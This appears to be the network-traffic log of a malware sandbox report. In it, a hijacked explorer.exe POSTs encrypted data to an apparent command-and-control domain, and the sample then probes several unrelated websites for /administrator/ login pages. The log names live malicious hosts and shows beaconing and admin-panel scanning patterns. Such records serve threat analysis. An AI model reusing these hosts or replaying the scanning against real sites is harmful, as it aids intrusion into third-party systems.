                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu_;zLd]n*n'3}g?#$8F\ug?-yz@9KYSX>Qw\ZQEfaE9G#%.
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:14.385591984 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:13 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                59192.168.2.64980891.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:22.102662086 CET336OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://iwmciwewihyndri.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:22.102742910 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:22.347738981 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:22 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                60192.168.2.65316315.197.142.17380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.323858023 CET233OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: malibusands.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.427774906 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: ip-10-123-123-244.ec2.internal
                                                                                                                                                                                                                                                                                                                X-Request-Id: 469e6cbe-2600-49f5-8027-68350022db59
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.756804943 CET290OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: malibusands.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://malibusands.net/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.858576059 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: ip-10-123-123-244.ec2.internal
                                                                                                                                                                                                                                                                                                                X-Request-Id: 1d410ad4-3f68-47e2-941c-31909849a401
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                61192.168.2.6531763.33.130.19080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.324157000 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.486198902 CET892INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/administrator/
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_kz+IwM/9yelldsKjA4a67d+q9pkK2TOANAojr+y5JYWZvcTZ32P2l7wGFva/489jEx0vMIvMGvx/Y2SAYZKX6Q
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.80.178;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.324444056 CET359OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: https://mgnbizlaw.com/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.483956099 CET901INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_jsB/lvHndMwHFPRRHqzc7ygWNM79MX/PXQoizs90Q+JaPJ07KNmzWWdZxFRjQb48xDmHnG9DAx5a+ydl2ag4RA
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.80.178;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                62192.168.2.6531753.33.130.19080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.387171030 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.490354061 CET892INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/administrator/
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_kz+IwM/9yelldsKjA4a67d+q9pkK2TOANAojr+y5JYWZvcTZ32P2l7wGFva/489jEx0vMIvMGvx/Y2SAYZKX6Q
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.101;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.587045908 CET359OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: traffic_target=gd; caf_ipaddr=10.116.80.178; country=; city=""
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: https://mgnbizlaw.com/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.689493895 CET901INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_jsB/lvHndMwHFPRRHqzc7ygWNM79MX/PXQoizs90Q+JaPJ07KNmzWWdZxFRjQb48xDmHnG9DAx5a+ydl2ag4RA
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.101;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                63192.168.2.65317066.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.389260054 CET237OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.538017035 CET314INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.757270098 CET298OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://jumpnsplashwear.com/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.870577097 CET314INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                64192.168.2.65316866.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.389446020 CET237OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.551196098 CET314INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.756915092 CET298OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://jumpnsplashwear.com/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.890608072 CET314INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                65192.168.2.65316566.115.173.18880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.389624119 CET243OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                66192.168.2.65317266.115.173.18880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.390352011 CET243OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.894709110 CET521INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=6f6b4609b4bb7f4cade025a49d9d7cfa; path=/
